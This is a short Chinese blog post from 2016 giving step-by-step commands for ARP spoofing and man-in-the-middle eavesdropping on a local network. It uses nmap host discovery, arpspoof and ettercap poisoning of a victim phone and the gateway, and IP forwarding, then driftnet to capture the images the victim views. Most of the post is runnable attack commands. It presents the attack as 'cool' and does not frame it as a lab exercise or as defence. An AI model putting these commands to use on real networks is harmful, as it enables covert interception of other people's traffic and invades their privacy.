使用arpspoof、attercap进行ARP欺骗
发表于2016/9/2 19:51:53 3681人阅读
分类: 网络安全
Arpspoof工具进行ARP欺骗
→1、先探测一下局域网的活动主机nmap –sS –PR 192.168.0.0/24
→2、打开一个终端,针对其中的一个IP Arpspoof –i wlan0 –t 192.168.0.105 192.168.0.1 ,使目标流量经过自己的网卡
192.168.0.1网关的IP地址。
192.168.0.105是被攻击主机的IP(这里是一台手机)。
→3、打开另一个终端echo 1>/proc/sys/net/ipv4/ip_forward 进行IP流量转发
192.168.0.1网关的IP地址。
192.168.0.110是攻击主机的IP地址。
→4、再打开一个终端,driftnet –i wlan0
然后就可以中间人监听了,被攻击者(手机)打开一张图片时,攻击者就能看到被攻击手机打开的图片,是不是很酷。
使用ettercap进行ARP中间人攻击
→1、先探测一下局域网活动的主机nmap -sN –PR 192.168.0.0/24
→2、对被攻击主机进行ARP欺骗 ettercap -i wlan0 -Tq -M arp:remote/192.168.0.106// 192.168.0.1//
192.168.0.106被攻击主机IP地址
192.168.0.1 网关地址
→3、监听wlan0 driftnet –i wlan0
Driftnet –I wlan0 –a –d ./
-a表示后台运行,保存到指定目录下
-d指定目录
